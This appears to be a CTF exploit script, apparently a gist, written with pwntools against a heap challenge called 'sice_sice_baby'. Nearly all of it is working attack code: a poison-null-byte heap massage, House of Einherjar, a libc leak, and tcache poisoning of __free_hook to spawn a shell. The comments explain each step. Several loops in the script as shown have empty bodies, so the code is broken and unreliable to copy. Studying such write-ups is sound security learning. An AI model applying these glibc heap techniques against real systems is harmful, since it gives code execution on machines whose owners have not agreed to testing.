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Last active February 8, 2021 04:49
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from pwn import *
context.log_level = "DEBUG"
#context.terminal = ['tmux', 'splitw', '-hp', '60']
libc = ELF("./")
elf = ELF("./sice_sice_baby")
#p = gdb.debug(elf.path, "c")
#p = process(elf.path)
p = remote("", 31914)
counter = -1
def alloc(size=24):
global counter
counter += 1
p.sendlineafter(">", "1")
p.sendlineafter(">", str(size))
return counter
def free(ind):
p.sendlineafter(">", "2")
p.sendlineafter(">", str(ind))
def show(ind):
p.sendlineafter(">", "4")
p.sendlineafter(">", str(ind))
def edit(ind, data=""):
p.sendlineafter(">", "3")
p.sendlineafter(">", str(ind))
if data != "":
p.sendafter(">", data)
p.sendlineafter(">", data)
# reads in a size and allocates that size
# chunk is stored in chunk array and size is stored in size array
# odd (int) global array index entry nulling at the end of alloc,
# referenced in all functions (W access in alloc, delete and edit, R access in show)
# doesn't read any data in after allocating
# 0xe8 max request size
# reads in an index
# free(chunks[ind]) and nulls the index so no double free
# nulls the size
# nulls the (int) array index entry
# bound checks the entered index (ulong) so no over or underref
# checks that the chunks is allocated
# reads size into chunk
# read & 3 == 0 to prevent partial overwrites
# poison null byte in edit when the amount of chars read is equal to the chunk data size
# bounds checks and all that
# can only show a previously edited chunk, that's what the weird array was used for
# this means no leak because show uses puts and edit null terminates
# probably gonna need to do leakless massage for poison null byte then leakless einherjar
# into overlap into leak by having a chunk previously edited and putting pointers
# there afterwards with overlap
for i in range(7):
for i in range(7):
alloc(0xe8) # 14
# A is going to be the fake chunk to consolidate backwards to when we trigger the House of Einherjar
# it has to be positioned on an address ending on 0x00 to be able to massage the other pointers correctly,
# hence the 0xe8 allocation on #4 to adjust the heap to allign this
# AP is simply another small sized chunk used to consolidate A backwards and keep its pointers in the heap
AP = alloc(0xc8) # 15
A = alloc(0x88) # 16
alloc(24) # 17, fencepost
# D is simply a chunk that is in the same 0x100 range of the A chunk. It will be inserted into the unsortedbin later
# to massage the other pointers correclty
D = alloc(0xc8) # 18
alloc(24) # 19, fencepost
# B is going to be the chunk pointed to by the fd (iirc?) of A, so we will need to massage its bk pointer to point
# back to A
# Again, BP is simply used to later consolidate backwards and keep the pointers
BP = alloc(0xc8) # 20
B = alloc(0xc8) # 21
alloc(24) # 22, fencepost
# C is going to be the chunk pointed to by the bk (iirc?) of A, so we will need to massage its fd pointer to point
# back to A
# Again, CP is simply used to later consolidate backwards and keep the pointers
CP = alloc(0xc8) # 23
C = alloc(0xc8) # 24
alloc(24) # 25, fencepost
# this chunks are later going to be used to fill up the 0x100 tcachebin
# to do this, we create a 0x1a0-sized unsortedbin, then allocate a 0xa0 sized chunk to leave a 0x100 unsortedbin.
# From there, a 0xe8 allocation will be served from the entire unsorted chunk.
# The way to get 0x100 chunks served on 0xe8 allocations was the detail I missed during the competition.
# I had already done a very similar massage before, so after getting that final detail the exploit was complete.
for i in range(8):
alloc(0xc8) # 26
alloc(0xc8) # 27
alloc(24) # 28
# fill up the 0xd0 and 0x90 tcachebins
for i in range(7):
for i in range(7):
# set pointers for A
free(B) # 21
free(A) # 16
free(C) # 24
# consolidate backwards to keep pointers
free(AP) # 15
free(CP) # 23
free(BP) # 20
# get the tcache chunks back to be able to allocate from the unsorted
for i in range(7):
alloc(0xc8) # 0-6
for i in range(7):
alloc(0x88) # 7-13
# now we need to set the pointers on B and C correctly as well
# served from the AP-A unsorted
alloc(0xe8) # 15
# served from the CP-C unsorted (iirc?)
alloc(0xc8) # 16
alloc(0xc8) # 20
# served from the BP-B unsorted (iirc?)
alloc(0xc8) # 21
alloc(0xc8) # 23
# fill up the tcachebins again
for i in range(7): # 0-6
for i in range(7): # 7-13
# free C and B, make their needed pointers point to D
free(D) # 18
# coalesce both chunks backwards
# allocate to be able to use the poison null byte to null out the LSB of B's bk and C's fd
alloc(0xe8) # 0, lower
alloc(0xe8) # 1, higher
# Null LSBs
edit(0, "\x00"*0xd8) # lower poison null
edit(1, "\x00"*0xd0) # higher poison null
# free to create first 0x1a0 unsorted to get the 0x100 chunk that will be used for the House of Einherjar
# allocate a couple of chunks to consume previous unsorted chunks and allocate from the recently created chunk
alloc(0x98) # 2
alloc(0x98) # 3
alloc(0x98) # 4
alloc(0x98) # 5
alloc(0xe8) # 6, for einherjar
# free some tcache, fencepost chunks just to organize a little the remaining indexes (this is not necessary)
# the following actions fill up the 0x100 tcachebin
for i in range(21):
free(i+29) # create needed unsorted chunks
for i in range(7): # allocate correctly sized chunks (don't pay attention to the indexes commented here, complete mess)
alloc(0x98) # 7, 9, 11, 13, 16, 18, 20
alloc(0xe8) # 8, 10, 12, 15, 17, 19, 21
# uhh nvm this got confusing
# just free the 0x100 chunks into the tcache later
# xd
# edit the needed metadata (size, prev_size) and use the poison null byte to null out chunk 6's prev_inuse bit
edit(15, "\x00"*0xc8 + p32(0x5c1))
edit(5, "\x00"*0x90 + p64(0x5c0))
# free the 0x100 sized chunks and fill the tcachebin
# Trigger Einherjar
# served from the huge unsortedbin
alloc(0x78) # 6
# allignment purposes
alloc(0xd8) # 10
alloc(0xe8) # 12
# empty up the 0x20 tcachebin (I have no clue why I had to allocate 10 chunks here, but that's that maybe I'm blind lol)
for i in range(10):
alloc(0x18) # 15, 16, 18, 20, 22, 23, 24, 25, 26, 27
alloc(0x18) # 28, more allignment
edit(22, "aaaa") # just to turn on the "editted" state to be able to show later
alloc(0x18) # 29, pushes the unsortedbin pointers to the tcache chunk (index 22) that can be showed
show(22) # get libc leak
leak = u64(p.recvline()[1:-1].ljust(8, "\x00"))
libc.address = leak - 0x1eabe0
alloc(0x18) # 30, for tcache count
edit(22, p64(libc.sym.__free_hook - 8) + p64(0)) # tcache poison into __free_hook - 8 to use the system trick
alloc(0x18) # 29
alloc(0x18) # 30
edit(30, "/bin/sh\x00" + p64(libc.sym.system)) # edit hook with the corresponding necessary addresses
free(30) # pop a shell!
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